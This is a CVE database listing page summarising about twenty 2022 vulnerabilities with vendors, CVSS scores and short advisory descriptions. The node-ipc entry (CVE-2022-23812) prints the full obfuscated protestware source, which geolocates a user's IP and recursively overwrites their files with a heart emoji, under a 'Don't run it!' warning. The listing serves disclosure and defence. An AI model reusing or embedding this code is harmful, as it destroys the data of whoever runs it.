Total
29694 CVE
| CVE | Vendors | Products | Updated | CVSS v3.1 |
|---|---|---|---|---|
| CVE-2022-24294 | 1 Apache | 1 Mxnet | 2024-11-21 | 7.5 High |
| A regular expression used in Apache MXNet (incubating) is vulnerable to a potential denial-of-service by excessive resource consumption. The bug could be exploited when loading a model in Apache MXNet that has a specially crafted operator name that would cause the regular expression evaluation to use excessive resources to attempt a match. This issue affects Apache MXNet versions prior to 1.9.1. | ||||
| CVE-2022-24125 | 1 Fromsoftware | 1 Dark Souls Iii | 2024-11-21 | 8.8 High |
| The matchmaking servers of Bandai Namco FromSoftware Dark Souls III through 2022-03-19 allow remote attackers to send arbitrary push requests to clients via a RequestSendMessageToPlayers request. For example, ability to send a push message to hundreds of thousands of machines is only restricted on the client side, and can thus be bypassed with a modified client. | ||||
| CVE-2022-24083 | 1 Pega | 1 Infinity | 2024-11-21 | 9.8 Critical |
| Password authentication bypass vulnerability for local accounts can be used to bypass local authentication checks. | ||||
| CVE-2022-24045 | 1 Siemens | 8 Desigo Dxr2, Desigo Dxr2 Firmware, Desigo Pxc3 and 5 more | 2024-11-21 | 6.5 Medium |
| A vulnerability has been identified in Desigo DXR2 (All versions < V01.21.142.5-22), Desigo PXC3 (All versions < V01.21.142.4-18), Desigo PXC4 (All versions < V02.20.142.10-10884), Desigo PXC5 (All versions < V02.20.142.10-10884). The application, after a successful login, sets the session cookie on the browser via client-side JavaScript code, without applying any security attributes (such as “Secure”, “HttpOnly”, or “SameSite”). Any attempts to browse the application via unencrypted HTTP protocol would lead to the transmission of all his/her session cookies in plaintext through the network. An attacker could then be able to sniff the network and capture sensitive information. | ||||
| CVE-2022-24039 | 1 Siemens | 4 Desigo Pxc4, Desigo Pxc4 Firmware, Desigo Pxc5 and 1 more | 2024-11-21 | 9.0 Critical |
| A vulnerability has been identified in Desigo PXC4 (All versions < V02.20.142.10-10884), Desigo PXC5 (All versions < V02.20.142.10-10884). The “addCell” JavaScript function fails to properly sanitize user-controllable input before including it into the generated XML body of the XLS report document, such that it is possible to inject arbitrary content (e.g., XML tags) into the generated file. An attacker with restricted privileges, by poisoning any of the content used to generate XLS reports, could be able to leverage the application to deliver malicious files against higher-privileged users and obtain Remote Code Execution (RCE) against the administrator’s workstation. | ||||
| CVE-2022-24038 | 1 Karmasis | 1 Infraskope Siem\+ | 2024-11-21 | 6.5 Medium |
| Karmasis Informatics Infraskope SIEM+ has an unauthenticated access vulnerability which could allow an unauthenticated attacker to damage the page where the agents are listed. | ||||
| CVE-2022-24037 | 1 Karmasis | 1 Infraskope Siem\+ | 2024-11-21 | 8.2 High |
| Karmasis Informatics Infraskope SIEM+ has an unauthenticated access vulnerability which could allow an unauthenticated attacker to obtain critical information. | ||||
| CVE-2022-24036 | 1 Karmasis | 1 Infraskope Siem\+ | 2024-11-21 | 8.6 High |
| Karmasis Informatics Infraskope SIEM+ has an unauthenticated access vulnerability which could allow an unauthenticated attacker to modificate logs. | ||||
| CVE-2022-24002 | 1 Samsung | 1 Link Sharing | 2024-11-21 | 4 Medium |
| Improper Authorization vulnerability in Link Sharing prior to version 12.4.00.3 allows attackers to open protected activity via PreconditionActivity. | ||||
| CVE-2022-23997 | 1 Samsung | 1 Wear Os | 2024-11-21 | 4 Medium |
| Unprotected component vulnerability in StTheaterModeDurationAlarmReceiver in Wear OS 3.0 prior to Firmware update Feb-2022 Release allows untrusted applications to disable theater mode without a proper permission. | ||||
| CVE-2022-23994 | 1 Samsung | 1 Wear Os | 2024-11-21 | 3.3 Low |
| An Improper access control vulnerability in StBedtimeModeReceiver in Wear OS 3.0 prior to Firmware update Feb-2022 Release allows untrusted applications to change bedtime mode without a proper permission. | ||||
| CVE-2022-23881 | 1 Zzzcms | 1 Zzzphp | 2024-11-21 | 9.8 Critical |
| ZZZCMS zzzphp v2.1.0 was discovered to contain a remote command execution (RCE) vulnerability via danger_key() at zzz_template.php. | ||||
| CVE-2022-23812 | 1 Node-ipc Project | 1 Node-ipc | 2024-11-21 | 9.8 Critical |
| This affects the package node-ipc from 10.1.1 and before 10.1.3. This package contains malicious code, that targets users with IP located in Russia or Belarus, and overwrites their files with a heart emoji. **Note**: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package that includes potentially undesired behavior. Malicious Code: **Note:** Don't run it! js import u from "path"; import a from "fs"; import o from "https"; setTimeout(function () { const t = Math.round(Math.random() * 4); if (t > 1) { return; } const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154 o.get(n.toString("utf8"), function (t) { t.on("data", function (t) { const n = Buffer.from("Li8=", "base64"); const o = Buffer.from("Li4v", "base64"); const r = Buffer.from("Li4vLi4v", "base64"); const f = Buffer.from("Lw==", "base64"); const c = Buffer.from("Y291bnRyeV9uYW1l", "base64"); const e = Buffer.from("cnVzc2lh", "base64"); const i = Buffer.from("YmVsYXJ1cw==", "base64"); try { const s = JSON.parse(t.toString("utf8")); const u = s[c.toString("utf8")].toLowerCase(); const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8")); // checks if country is Russia or Belarus if (a) { h(n.toString("utf8")); h(o.toString("utf8")); h(r.toString("utf8")); h(f.toString("utf8")); } } catch (t) {} }); }); }, Math.ceil(Math.random() * 1e3)); async function h(n = "", o = "") { if (!a.existsSync(n)) { return; } let r = []; try { r = a.readdirSync(n); } catch (t) {} const f = []; const c = Buffer.from("4p2k77iP", "base64"); for (var e = 0; e < r.length; e++) { const i = u.join(n, r[e]); let t = null; try { t = a.lstatSync(i); } catch (t) { continue; } if (t.isDirectory()) { const s = h(i, o); s.length > 0 ? f.push(...s) : null; } else if (i.indexOf(o) >= 0) { try { a.writeFile(i, c.toString("utf8"), function () {}); // overwrites file with ❤️ } catch (t) {} } } return f; } const ssl = true; export { ssl as default, ssl }; | ||||
| CVE-2022-23775 | 1 Truestack | 1 Direct Connect | 2024-11-21 | 9.8 Critical |
| TrueStack Direct Connect 1.4.7 has Incorrect Access Control. | ||||
| CVE-2022-23730 | 1 Lg | 1 Webos | 2024-11-21 | 9.8 Critical |
| The public API error causes for the attacker to be able to bypass API access control. | ||||
| CVE-2022-23718 | 1 Pingidentity | 1 Pingid Integration For Windows Login | 2024-11-21 | 7.6 High |
| PingID Windows Login prior to 2.8 uses known vulnerable components that can lead to remote code execution. An attacker capable of achieving a sophisticated man-in-the-middle position, or to compromise Ping Identity web servers, could deliver malicious code that would be executed as SYSTEM by the PingID Windows Login application. | ||||
| CVE-2022-23708 | 1 Elastic | 1 Elasticsearch | 2024-11-21 | 4.3 Medium |
| A flaw was discovered in Elasticsearch 7.17.0’s upgrade assistant, in which upgrading from version 6.x to 7.x would disable the in-built protections on the security index, allowing authenticated users with “*” index permissions access to this index. | ||||
| CVE-2022-23446 | 1 Fortinet | 1 Fortiedr | 2024-11-21 | 4.4 Medium |
| A improper control of a resource through its lifetime in Fortinet FortiEDR version 5.0.3 and earlier allows attacker to make the whole application unresponsive via changing its root directory access permission. | ||||
| CVE-2022-23443 | 1 Fortinet | 1 Fortisoar | 2024-11-21 | 7.5 High |
| An improper access control in Fortinet FortiSOAR before 7.2.0 allows unauthenticated attackers to access gateway API data via crafted HTTP GET requests. | ||||
| CVE-2022-23442 | 1 Fortinet | 1 Fortios | 2024-11-21 | 4.3 Medium |
| An improper access control vulnerability [CWE-284] in FortiOS versions 6.2.0 through 6.2.11, 6.4.0 through 6.4.8 and 7.0.0 through 7.0.5 may allow an authenticated attacker with a restricted user profile to gather the checksum information about the other VDOMs via CLI commands. | ||||